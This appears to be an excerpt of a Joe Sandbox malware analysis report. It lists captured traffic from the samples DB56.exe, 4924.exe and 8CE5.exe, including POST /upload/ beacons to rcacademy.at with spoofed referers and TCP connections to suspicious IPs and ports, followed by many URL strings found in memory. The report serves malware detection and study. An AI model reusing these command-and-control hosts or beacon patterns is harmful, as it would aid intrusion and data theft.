                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xefimpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dppsna.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: rcacademy.at
                      Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
                      Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                      Source: Joe Sandbox ViewIP Address: 45.9.20.240 45.9.20.240
                      Source: Joe Sandbox ViewIP Address: 190.117.75.91 190.117.75.91
                      Source: global trafficTCP traffic: 192.168.2.6:49850 -> 45.9.20.240:7769
                      Source: global trafficTCP traffic: 192.168.2.6:49865 -> 86.107.197.138:38133
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: 8CE5.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: 8CE5.exe.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: 8CE5.exe.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: 8CE5.exe.5.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: 8CE5.exe.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: 8CE5.exe.5.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.629708291.00000000030D1000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631190327.00000000032A5000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632904444.0000000003002000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632284032.0000000002E2E000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: 8CE5.exe.5.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: 8CE5.exe.5.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 8CE5.exe.5.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: DB56.exe, 00000012.00000002.625364382.0000000002E01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: DB56.exe, 00000012.00000002.626049960.0000000002E90000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
